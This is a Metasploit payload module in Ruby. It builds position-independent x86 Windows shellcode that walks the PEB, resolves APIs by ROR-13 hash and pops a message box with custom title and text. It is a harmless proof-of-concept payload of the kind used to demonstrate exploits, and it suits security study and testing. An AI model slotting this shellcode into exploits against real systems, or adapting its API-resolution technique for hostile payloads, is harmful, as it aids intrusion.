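   ##
   # $Id: messagebox.rb 4 2010-02-26 00:28:00:00Z corelanc0d3r & rick2600 $
   ##
   #
   # Installation instructions :
   # Drop file in framework3/modules/payloads/singles/windows folder
   #
   # Usage :   ./msfpayload windows/messagebox TITLE="Corelan" TEXT="Greetz to corelanc0d3r" P
   #
   # Note : TITLE and TEXT are embedded in the shellcode verbatim (as push
   # immediates) with no bad-character filtering or transcoding.  Keep them
   # to printable ASCII, or run the output through an encoder.
   #

   require 'msf/core'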
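   module Metasploit3

     include Msf::Payload::Windows
     include Msf::Payload::Single

     # Longest TITLE / TEXT accepted, in bytes (sentinel and padding come on
     # top of this).  Each string is null-terminated at run time with
     # "mov byte [esp+disp8], bl" (resp. cl); disp8 is sign-extended, so a
     # terminator index of 128 or more would write *below* esp instead of
     # into the string (and Integer#chr raises above 255 anyway).  The index
     # equals the string length, hence 127.
     MAX_STRING_LEN = 127

     # ROR-13 export-name hashes understood by the resolver in 'Payload'.
     EXITPROCESS_HASH = "\x7e\xd8\xe2\x73"   # ExitProcess()
     EXITTHREAD_HASH  = "\xEF\xCE\xE0\x60"   # ExitThread()

     def initialize(info = {})
       super(update_info(info,
         'Name'        => 'Windows Messagebox with custom title and text',
         'Version'     => '$Revision: 4 $',
         'Description' => 'Spawns MessageBox with a customizable title & text',
         'Author'      => [ 'corelanc0d3r - peter.ve[at]corelan.be',
                            'rick2600 - ricks2600[at]gmail.com' ],
         'License'     => BSD_LICENSE,
         'Platform'    => 'win',
         'Arch'        => ARCH_X86,
         'Privileged'  => false,
         'Payload'     =>
           {
             'Offsets' => { },
             # Fixed, position-independent x86 stub:
             #   fldpi / fnstenv [esp-0xc] GetPC; walk fs:[0x30] (PEB) -> Ldr ->
             #   InInitializationOrderModuleList until a module whose BaseDllName
             #   has a null wide char at index 12 (presumably kernel32.dll), with
             #   its DllBase left in eax; jmp over the export resolver (pushad,
             #   ROR-13 hash of each export name compared with [esp+0x28],
             #   address returned in eax, popad, ret); sub esp, 8 / mov ebp, esp;
             #   resolve hash 0xec0e4e8e (LoadLibraryA) into [ebp+4]; then the
             #   lone 0xbb opcode of "mov ebx, imm32" -- its immediate (the
             #   exit-function hash) is appended by #generate.
             'Payload' => "\xd9\xeb\x9b\xd9\x74\x24\xf4\x31"+
                          "\xd2\xb2\x7a\x31\xc9\x64\x8b\x71"+
                          "\x30\x8b\x76\x0c\x8b\x76\x1c\x8b"+
                          "\x46\x08\x8b\x7e\x20\x8b\x36\x38"+
                          "\x4f\x18\x75\xf3\x59\x01\xd1\xff"+
                          "\xe1\x60\x8b\x6c\x24\x24\x8b\x45"+
                          "\x3c\x8b\x54\x05\x78\x01\xea\x8b"+
                          "\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"+
                          "\x37\x49\x8b\x34\x8b\x01\xee\x31"+
                          "\xff\x31\xc0\xfc\xac\x84\xc0\x74"+
                          "\x0a\xc1\xcf\x0d\x01\xc7\xe9\xf1"+
                          "\xff\xff\xff\x3b\x7c\x24\x28\x75"+
                          "\xde\x8b\x5a\x24\x01\xeb\x66\x8b"+
                          "\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b"+
                          "\x04\x8b\x01\xe8\x89\x44\x24\x1c"+
                          "\x61\xc3\xb2\x08\x29\xd4\x89\xe5"+
                          "\x89\xc2\x68\x8e\x4e\x0e\xec\x52"+
                          "\xe8\x9c\xff\xff\xff\x89\x45\x04"+
                          "\xbb"
           }
         ))

       # EXITFUNC: the stub resolves the exit routine by hash and calls it
       # directly, so only Process and Thread can be offered.  Swap the
       # framework-wide option for a restricted one.
       deregister_options('EXITFUNC')

       # Register MessageBox options
       register_options(
         [
           OptString.new('EXITFUNC', [ false,
             "Only Process (default) or Thread are supported", "process" ]),
           OptString.new('TITLE', [ true,
             "Messagebox Title (max #{MAX_STRING_LEN} chars)" ]),
           OptString.new('TEXT', [ true,
             "Messagebox Text (max #{MAX_STRING_LEN} chars)" ])
         ], self.class)
     end

     #
     # Constructs the payload.
     #
     # The fixed stub (module_info 'Payload') ends in the first byte of a
     # "mov ebx, imm32"; this method supplies the immediate (the exit
     # function hash), appends the user32 / MessageBox set-up, pushes TITLE
     # and TEXT onto the stack, null-terminates them in place, calls the
     # resolved MessageBox and finally the exit function with code 0.
     #
     # The generated code never contains the terminating nulls itself (they
     # are written at run time from a zeroed register); it does contain the
     # TITLE/TEXT bytes verbatim.
     #
     # Raises ArgumentError if TITLE or TEXT is missing or longer than
     # MAX_STRING_LEN bytes.
     #
     def generate
       exit_hash = messagebox_exit_hash(datastore['EXITFUNC'])

       title_push, title_end = messagebox_push_string(datastore['TITLE'], 'TITLE')
       text_push,  text_end  = messagebox_push_string(datastore['TEXT'],  'TEXT')

       payload_data = module_info['Payload']['Payload']
       payload_data += exit_hash                             # imm32 of the stub's trailing "mov ebx, ..."
       payload_data += "\x87\x1c\x24"                        # xchg [esp], ebx  (hash onto the stack, ebx = DLL base)
       payload_data += "\x52\xe8\x8b\xff\xff\xff\x89\x45"    # push edx ; call resolver ; mov [ebp+8], eax  (exit func)
       payload_data += "\x08\x68\x6c\x6c\x20\xff\x68\x33"    # push "ll \xff" ; push "32.d"
       payload_data += "\x32\x2e\x64\x68\x75\x73\x65\x72"    # push "user"   -> "user32.dll \xff" on the stack
       payload_data += "\x88\x5c\x24\x0a\x89\xe6\x56\xff"    # mov [esp+0xa], bl (bl is 0 if ebx is a page-aligned base) ;
                                                             # mov esi, esp ; push esi ; call [ebp+4]  (LoadLibraryA)
       payload_data += "\x55\x04\x89\xc2\x50\xbb\xa8\xa2"    # mov edx, eax ; push eax ; mov ebx, 0xbc4da2a8 (presumably MessageBoxA)
       payload_data += "\x4d\xbc\x87\x1c\x24\x52\xe8\x5e"    # xchg [esp], ebx ; push edx ; call resolver -> eax
       payload_data += "\xff\xff\xff"

       # TITLE on the stack, null-terminated in place, address kept in ebx.
       payload_data += title_push
       payload_data += "\x31\xdb\x88\x5c\x24" + title_end.chr + "\x89\xe3"   # xor ebx, ebx ; mov [esp+idx], bl ; mov ebx, esp

       # TEXT on the stack, null-terminated in place, address kept in ecx.
       payload_data += text_push
       payload_data += "\x31\xc9\x88\x4c\x24" + text_end.chr + "\x89\xe1"    # xor ecx, ecx ; mov [esp+idx], cl ; mov ecx, esp

       # MessageBox(hWnd = 0, lpText = ecx, lpCaption = ebx, uType = 0), then
       # <exit func>(0) through the pointer saved at [ebp+8].
       payload_data += "\x31\xd2\x52"                        # xor edx, edx ; push edx   (uType)
       payload_data += "\x53\x51\x52\xff\xd0\x31\xc0\x50"    # push ebx ; push ecx ; push edx ; call eax ; xor eax, eax ; push eax
       payload_data += "\xff\x55\x08"                        # call [ebp+8]

       payload_data
     end

     private

     #
     # ROR-13 hash of the routine the generated code calls on exit.
     #
     # Only "process" and "thread" are supported; anything else, including
     # nil, yields ExitProcess.  That silent fallback is the original
     # behaviour and is kept on purpose -- NOTE(review): raising here instead
     # could break exploits that set the framework-wide EXITFUNC values
     # (seh/none) this payload cannot implement; confirm before tightening.
     #
     def messagebox_exit_hash(name)
       return EXITTHREAD_HASH if name && name.downcase == 'thread'
       EXITPROCESS_HASH
     end

     #
     # Build the "push imm32" run that places +str+ on the stack.
     #
     # +str+ gets a sentinel 'X' appended (the byte overwritten with 0 at run
     # time) and is space-padded to a multiple of 4, then emitted as one 0x68
     # push per 4 bytes, last chunk first, so that once they have executed
     # esp points at the first byte.  Returns [push_bytes, index]; the caller
     # must emit "mov byte [esp+index], <zeroed reg>" after the pushes -- the
     # shellcode never contains the terminating null itself.
     #
     # The bytes of +str+ are copied verbatim: no bad-character filtering or
     # transcoding is done, so a TITLE/TEXT holding bytes the target cannot
     # take (0x00, etc.) must be avoided or handled by an encoder.  Only ASCII
     # is really supported; on Ruby 1.9+ non-ASCII input may raise
     # Encoding::CompatibilityError when joined with the binary stub.
     #
     # +option+ names the datastore entry for error messages.  Raises
     # ArgumentError when +str+ is nil or longer than MAX_STRING_LEN bytes.
     #
     def messagebox_push_string(str, option)
       raise ArgumentError, "#{option} is required" if str.nil?

       bytes = str.unpack('C*')
       if bytes.size > MAX_STRING_LEN
         raise ArgumentError, "#{option} must be #{MAX_STRING_LEN} bytes or less"
       end

       terminator = bytes.size                   # where the run-time null goes
       bytes << 0x58                             # 'X' sentinel, overwritten by that null
       bytes << 0x20 until bytes.size % 4 == 0   # pad to a whole number of pushes

       # Prepend each chunk so the last one is pushed first.
       pushes = ''
       (0...bytes.size).step(4) do |i|
         pushes = "h" + bytes[i, 4].pack('C*') + pushes   # "h" == 0x68 == push imm32
       end

       [pushes, terminator]
     end
   end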



